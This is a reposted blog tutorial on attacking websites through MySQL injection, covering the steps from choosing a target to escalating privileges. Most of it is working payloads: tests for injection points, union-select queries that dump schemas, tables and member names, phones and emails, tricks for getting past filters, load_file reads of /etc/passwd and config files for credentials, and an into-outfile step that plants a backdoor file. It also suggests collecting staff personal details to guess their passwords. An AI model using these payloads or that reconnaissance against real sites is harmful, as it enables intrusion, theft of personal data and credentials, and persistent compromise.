A Brief Talk on Mysql Injection Experience

Others 2021-03-28 10:24:01 views: null

A Brief Talk on Mysql Injection Experience


1. Injection preparation and attack steps

1. Confirm the target website of the injection attack

2. Collection, analysis and extraction of general information on the target website

3. Website technical analysis: find and test available injection points, analysis of web page input and output mechanism

4. The spy's return: Inject SQL to determine the database type and the current account permission level

5. Analysis of privilege escalation: According to the user level, determine whether it can interact with the system layer to escalate its privilege, whether it can interact with the database layer to escalate its privilege, and whether it is possible to obtain the authority of the web background administrator.

6. The website can be used for SQL injection type testing, blind injection? Significant?

7. Blind injection strategy: use injection analysis tools to replace labor

​ Remarkable strategy: the third party is on top

Collection, analysis and extraction of general information:

Belief: No useless information

As long as it is artificial, there will be the possibility of loopholes. Any information will reveal another layer of information behind it.

1. Domain name information

2. Extended information of domain name information, such as registrant, company, contact number and other information collection

3. Information collection of all relevant staff on the website, such as the relevant contact information of technical R&D personnel, QQ, mobile phones, blogs, Weibo, etc. The goal is to get the habits and rules of password setting of relevant personnel.

technical analysis:

1. Technical analysis

The possibility of general information association, web page source code analysis, input and output mechanism analysis, find and test available injection points.

2. Use the Firefox browser to install the browser plug-in Hackbar


2. Discovery and testing of injection points

1. Common injection points

a. Input fields in the form

b. URL parameters (more common)

c. Cookie or hidden domain

2. Input fields in the form, cookies or hidden fields

It is necessary to fully analyze, filter and extract the input and output mechanisms of web pages, and understand the possible mechanisms for executing SQL injection, such as the input domain, cookie, url parameter variable name, and how to pass it to the database engine.

3. URL parameters

—First use invariant logic and empty set logic to determine which parameter is the injection point

Character type parameter: single quotation mark' or double quotation mark test whether it can be closed

'and '1'='1 unchanged logic, test webpage or program display correctly

'and '1'='2 Empty set logic, test webpage or program display incorrectly or report an error

'or '1'='1 Complete set of logic, test whether the processing of the amount of data on the web page has changed

Integer type parameters:

and 1=1 unchanged logic, the test page or program is displayed correctly

and 1=2 Empty set logic, test page or program display incorrectly or report an error

or 1=1 Complete set logic, test whether the processing of the data volume by the webpage has changed

-Obtain effective information from the injection point

and left(version(),1)=5

and substr(version(),1,1)=5 //Determine whether the first number of the database version number is 5

Return the correct description:

1. The database is mysql

2. Unfiltered execution of database functions

3. The parentheses are not filtered

4. The subquery may not be filtered

5. Complex logic can be injected

6. Assess the degree of injection

—Confirmation of user authority level

user()

Web page injection test: and (select length(user()) from mysql.user where user like'z%')>1

and (select count(*) from mysql.user where user=user())>=1

and (select length(user()) from mysql.user where user=user())>=1

Return the correct description:

1. Have permission to the mysql dictionary database, otherwise no permission

​ If you don't have permission, you will be restricted to obtain passwords, and you must think of other ways, such as the password of the administrator of the web site.

2. If you do not have permission to the mysql dictionary library, you need to test the test permission to the information_schema dictionary library

注入测试:and (select count(*) from information_schema.tables where table_schema=database())>1

Return the correct description:

Has permission to the information_schema dictionary library, and can obtain all databases, all tables, and all dictionary information. It is helpful to break the administrator authority of the web background.


Three, confirm the type of SQL injection in the attack strategy

Classified by output mechanism:

Blind note: The content of the output database is not displayed on the webpage, only logical judgment.

Error report: make full use of the help of the program and database error report and tell all the information stupidly

Significant note: the content of the injected query statement is displayed on the web page

Other: email, ftp, samba and other protocols

Significant note: the third party is in power

and 1=2 union select 1,2,3,4,5,6,7,8,9 --+ //–+ is used to comment out the following SQL statement, and + is used to avoid possible checks for spaces

//Observe the upper number on the page, this position can be constructed with special statements to expose database information

Subquery test:

Alternative program query, only query database dictionary information:

union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables where table_schema=database() limit 1 – //查询表名

//When the echo position is limited, you can use the concat(), concat_ws(), group_concat() functions to echo more information


Fourth, evade inspection injection

The circumvention of space check:

1. or–+1=!!1 Use invariant logic !! or!!! instead of spaces

2. Comment instead of and/**/select/**/uname/**/from/**/users

3. Replace the + sign connection character

4. Use hexadecimal code %20

5. ASCII code replaces char(32)

The circumvention of single quotes:

1. Change another way

and left(user(),1)=‘z’ 换成 and ascii(left(user(),1))=122


### Fifth, violating the database and obtaining background administrator permissions

Storm database name

and 1=2 union select 1,2,3,4,concat_ws(’~’,schema_name),6,7,8,9 from information_schema.schemata limit 1,10 –

Violent table name//Getting the web backend administrator password may exist tables such as: %user%, %member%

and 1=2 union select 1,2,3,4,concat_ws(’~’,table_schema,table_name,table_rows,table_comment),6,7,8,9 from information_schema.tables where table_schema=database() –

Violent field name//column_name, column_comment may describe the function of the field

and 1=2 union select 1,2,3,4,concat_ws(’~’, table_schema, table_name, column_name, column_comment),6,7,8,9 from information_schema.columns where table_schema=database() and table_name=‘member’ limit 1,10 –

Storm field value

and 1=2 union select 1,2,3,4,concat_ws(’~’,member_name,mobile,e_mail),6,7,8,9 from zakkanet.member limit 1,100 –

//where like %admin% to find out the sensitive information of the administrator

Circumstances excluded:

If the return is empty, is the sentence entered incorrectly or is the original echo empty?

ifnull('table_name','null_tablename') //If the table field is empty, then null_tablename will be echoed

Six, system interactive right escalation

1. The way to interact with the system layer

  • Read and write disk files

  • Directly execute commands

    Interaction with the system layer to escalate privileges depends on what privileges the mysql server process runs under, and what privilege levels are used by the database account connected to the program.

2. Read system files

load_file(’/etc/password’)

select uid,uname from users where uid=10008 and 0=9 union select 1,load_file(’/etc/passwd’)

select uid,uname from users where uid=10008 and 0=9 union select 1,load_file('/var/www/html/web.config') //Read website configuration file

dbconfig.conf //Read website configuration information, get user name and password information

Use substr, char, ascii, etc. for blinds

3. Keep the backdoor script file

select ' <script>alert()</script>' into outfile'/var/www/html/test.php'; // Confused test script


Seven, SQL injection vulnerability detection tool

1. Replace manual methods to automatically detect vulnerable URLs

Safe3 SQL Injector

It is the most powerful and easy-to-use penetration testing tool, which can automatically detect and exploit SQL injection vulnerabilities and database server processes.

Safe3 SQL Injector has the ability to read MySQL, Oracle, PostgreSQL, SQL Server, Access, SQLite, Firebird, Sybase, SAP, MaxDB and other databases. At the same time, it supports writing files to MySQL and SQL Server, and executing arbitrary commands in SQL Server and Oracle. Safe3 SQL Injector also supports error-based, Union-based and blind time based injection attacks.

2. Exhaustively possible injection of the specified URL

Needless to say, Sqlmap injects artifacts

Guess you like

Origin blog.csdn.net/qq_43665434/article/details/114629706
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com